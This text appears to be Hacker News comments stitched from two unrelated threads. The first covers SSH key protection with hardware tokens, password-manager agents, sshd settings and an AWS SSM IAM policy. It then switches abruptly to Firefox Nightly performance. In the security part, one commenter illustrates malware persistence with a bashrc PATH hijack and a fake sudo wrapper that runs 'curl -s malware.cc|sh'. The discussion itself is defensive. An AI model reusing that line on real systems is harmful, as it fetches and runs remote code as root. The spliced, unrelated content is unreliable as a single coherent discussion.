With this setup there are two different SSH keys, one for access to GitHub, one is a commit signing key, but you don't use either to push/pull to GitHub, you use OAuth (over HTTPS). This combination provides the most security (without hardware tokens) and 1Password and the OAuth apps make it seamless.

Do not use a user with admin credentials for day to day tasks, make that a separate user in 1Password. This way if your regular account gets compromised the attacker will not have admin credentials.

[1] https://developer.1password.com/docs/ssh/agent/ [2] https://developer.1password.com/docs/ssh/git-commit-signing/ [3] https://github.com/hickford/git-credential-oauth [4] https://cli.github.com/manual/gh_auth_login

[1] https://bitwarden.com/help/ssh-agent/

One benefit of Microsoft requiring them for Windows 11 support is that nearly every recent computer has a TPM, either hardware or emulated by the CPU firmware.

It guarantees that the private key can never be exfiltrated or copied. But it doesn't stop malicious software on your machine from doing bad things from your machine.

So I'm not certain how much protection it really offers on this scenario.

Linux example: https://wiki.gentoo.org/wiki/Trusted_Platform_Module/SSH

macOS example (I haven't tested personally): https://gist.github.com/arianvp/5f59f1783e3eaf1a2d4cd8e952bb...

https://wiki.archlinux.org/title/SSH_keys#FIDO/U2F

That's what I do. For those of us too lazy to read the article, tl;dr:

  ssh-keygen -t ed25519-sk

  ssh-keygen -t ecdsa-sk

Use the ssh key as usual. OpenSSH will ask you to tap the token every time you use it: silent git pushes without you confirming it by tapping the token become impossible. Extracting the key from your machine does nothing — it's useless without the hardware token.

  MaxStartups
               Specifies the maximum number of concurrent unauthenticated
               connections to the SSH daemon.  Additional connections
               will be dropped until authentication succeeds or the
               LoginGraceTime expires for a connection.  The default is
               10:30:100.

               Alternatively, random early drop can be enabled by
               specifying the three colon separated values
               start:rate:full (e.g. "10:30:60").  sshd(8) will refuse
               connection attempts with a probability of rate/100 (30%)
               if there are currently start (10) unauthenticated
               connections.  The probability increases linearly and all
               connection attempts are refused if the number of
               unauthenticated connections reaches full (60).

Admittedly I'd put this more in the category of making endpoint compromise easier to detect than that of actually preventing any particular theft of data or manipulation of systems. But it might still be worth doing! If it means only a few dozen or only a hundred repos get compromised before detection instead of a few thousand, that's a good thing.

Besides all that (or MaxSessions, as another user mentions), if an attacker compromises a developer laptop and can only open those connections as long as the developer is online, that's one thing. But a plaintext key that they can grab and reuse from their own box is obviously an even sweeter prize!

"The SSH key on my YubiKey is useless to attackers" is obviously the wrong way to think about this, but using a smartcard for SSH keys is still a way to avoid storing plaintext secrets. It's good hygiene.

--

https://www.man7.org/linux/man-pages/man5/sshd_config.5.html

Anyway, what about the sshd server having this config line:

    sshd_config MaxSessions 1

You can make it a bit more challenging for the attacker by using secure enclaves (like TPM or Yubikey), enforce signed commits, etc. but if someone compromised your machine, they can do whatever you can.

Enforcing signing off on commits by multiple people is probably your only bet. But if you have admin creds, an attacker can turn that off, too. So depending on your paranoia level and risk appetite, you need a dedicated machine for admin actions.

It can also just get lucky and perform a 'git push' while your SSH agent happens to be unlocked. We don't want to rely on luck here.

Really, it's pointless. Unless you are signing specific actions from an independent piece of hardware [1], the malware can do what you can do. We can talk about the details all day long, and you can make it a bit harder for autonomously acting malware, but at the end of the day it's just a finger exercise to do what they want to do after they compromised your machine.

[1] https://www.reiner-sct.com/en/tan-generators/tan-generator-f... (Note that a display is required so you can see what specific action you are actually signing, in this case it shows amount and recipient bank account number.)

The malware puts this in your bashrc or equivalent:

    PATH=/tmp/malware/bin:$PATH

    #!/bin/bash
    /sbin/sudo bash -c "curl -s malware.cc|sh && $@" 

You say it's unlikely, fine, so your risk appetite is sufficiently high. I just want to highlight the risk.

If your machine is compromised, it's game over.

A compromised laptop should always be treated as a fully compromised. However, you can take steps that drastically reduce the likelihood of bad things happening before you can react (e.g. disable accounts/rotate keys).

Further, you can take actions that inherently limit the ability for a compromise to actually cause impact. Not needing to actually store certain things on the machine is a great start.

You can also just generate new ssh keys and protect them with a pin.

not storing SSH keys on the filesystem, and instead using an agent (like 1Password) to mediate access

Stop storing dev secrets/credentials on the filesystem, injecting them into processes with env vars or other mechanisms. Your password manager could have a way to do this.

Develop in a VM separate from your regular computer usage. On windows this is essential anyway through using WSL, but similar things exist for other OSs

There are lots of agents out there, from the basic `ssh-agent`, to `ssh-agent` integrated with the MacOS keychain (which automatically unlocks when you log in), to 1Password (which is quite nice!).

A case like this brings this out a lot. Compromised dev machine means that anything that doesn't require a separate piece of hardware that asks for your interaction is not going to help. And the more interactions you require for tightening security again the more tedious it becomes and you're likely going to just instinctively press the fob whenever it asks.

Sure, it raises the bar a bit because malware has to take it into account and if there are enough softer targets they may not have bothered. This time.

Classic: you only have to outrun the other guy. Not the lion.

Like, I see the comment about the Keychain integration and all that. But in the end I fail to see (without further explanation but I'm eager to learn if there's something I am unaware of) where this isn't different from what I am saying.

Like yes, my ssh key has a passphrase of course. Which is different from my system one actually. As soon as I log into the system I add the key, which means entering the passphrase once, so I don't have to enter it all the time. That would get old real fast. But now ssh can just use my key to do stuff and the agent doesn't know if it's me or I got compromised by npm installing something. And if you add a hardware token you "just have to tap" each time that's a step back into more security but does add tedium. Depending on how often my workflow uses ssh (or something that uses the key) in the background this will become something most people just blindly "tap" on. And then we are back towards less security but with more setup steps, complications and tedium.

I saw the "or allow for a session", which is a step towards security again, because I may be able to allow a script that does several things with ssh with a single tap, which is great of course. Hopefully that cuts the taps down so much that I don't just blindly tap on every request for it. Like the 1password thing you mentioned. If I do lots of things that make it "ask again" often enough I get pushed into "yeah yeah, I know the drill, just tap" security hole.

1Password, for example, will, for each new application, pop up a fingerprint request on my Mac before handling the connection request and allow additional requests for a configurable period of time -- and, by default, it will lock the agent when you lock your machine. It will also request authentication before allowing any new process to make the first connection. See e.g. https://developer.1password.com/docs/ssh/agent/security

I mean, if passphrases were good for anything you’d directly use them for the ssh connection? :)

Isn't that why all those security experts are pushing for SSL everywhere and 30 second certificate expiration? To make the medium unobservable by a third party?

If you believe them, passphrases should be okay over fiber you don't control too.

And yes, we all know that 2FA, passkeys, etc. are all better than passphrases, and that layer 3 wire encryption is important.

I’m merely responding to your blanket assertion that passphrases aren’t “secure enough,” but sometimes they are.

My SSH keys aren't on my computer: they're safely hidden on a hardware token, behind a secure element, like a Yubikey.

Devices like the Yubikey do precisely exist because computers aren't things to be trusted. So their reason for being is to offer a minimal attack surface.

When I git fetch/pull/push I just do it. But it requires me to physically use my Yubikey. It's not 100% foolproof but it's way better than having SSH keys only protected by a password.

So Git over SSH, on a Git/SSH server that supports Yubikeys.

https://docs.github.com/en/get-started/git-basics/caching-yo...

Also can u restrict access to ssh through ssm to certain ips?

Maybe I might have missed these, so any help would be appreciated.

Technically there is, you can use federated login. Might not be very convenient, depending on your identity provider.

A solution I use, while not technically "not using access kys" is storing them in the system credential store with aws-vault [0]. Works on Windows, Linux and Mac. And you can combine this with multi factor auth.

> Also can u restrict access to ssh through ssm to certain ips?

Yes, with an IAM policy. The policy below requires connecting with an MFA and from a specific IP range. It only allows connecting to a specific instance.

  {
    "Version": "2012-10-17",
    "Statement": [
      {
        "Sid": "VisualEditor0",
        "Effect": "Allow",
        "Action": "ssm:StartSession",
        "Resource": [
          "arn:aws:ec2:eu-west-3:123123123123:instance/i-123123123123",
          "arn:aws:ssm:eu-west-3::document/AWS-StartPortForwardingSession",
          "arn:aws:ssm:eu-west-3::document/AWS-StartSSHSession"
        ],
        "Condition": {
          "IpAddress": {
            "aws:SourceIp": "1.2.3.4/32"
          },
          "BoolIfExists": {
            "aws:MultiFactorAuthPresent": "true"
          }
        }
      }
    ]
  }

Broay this is because quantum is much further along in nightly than on the other channels. Specifically, they're more aggressive with multithreaded settings, multiprocess is enabled, and the quantum css component is turned on, too.

Is also helps that we compare to chrome. On Linux chrome doesn't even do GPU rendering. So the HN crowd probably has a disproportionately bad experience with it

I thought you were overstating it but I just tried it out and you're right, it's crazy fast.

As others have said here, I just installed Firefox Nightly after reading this, and you're 100% correct. I think it might even be faster than Chromium for me.

    Canvas: Hardware accelerated
    CheckerImaging: Disabled
    Flash: Hardware accelerated
    Flash Stage3D: Hardware accelerated
    Flash Stage3D Baseline profile: Hardware accelerated
    Compositing: Hardware accelerated
    Multiple Raster Threads: Enabled
    Native GpuMemoryBuffers: Software only. Hardware acceleration disabled
    Rasterization: Software only. Hardware acceleration disabled
    Video Decode: Software only, hardware acceleration unavailable
    Video Encode: Software only, hardware acceleration unavailable
    WebGL: Hardware accelerated
    WebGL2: Hardware accelerated

Have you tried using a fresh profile, just to narrow the possible variables?

If you've checked both of those things, and you can characterize the slowness in the context of specific operations (e.g. what "laggy" means, precisely), then I'd recommend filing a bug and working with the developers to track down the problem. Because that is not normal.

I just refreshed my profile and performance improved immensely.

You can check the acceleration status in about:support, look at HW_COMPOSITING and OPENGL_COMPOSITING.

On Linux, manually enabling GPU acceleration as user ac29 describes below can a big difference. Unfortunately, a lot of Linux GPU drivers have issues that prevent acceleration from being enabled by default for some users.

https://www.cnet.com/special-reports/mozilla-firefox-fights-...

and the whole article is on a floating div?

Firefox 55 marks classic extensions as legacy, this has nothing to do with multi-process comparability.

Then Ctrl+Shift+A.

Vivaldi has been a lot faster and mostly an alright experience, and I've watched many of the issues I've found for it get addresses in recent builds. Still there are many things I miss about Firefox, not to mention supporting that community and the browser I've used for well over a decade (including back when it was Phoenix, the original Mozilla and the old Netscape 6 that proceeded them).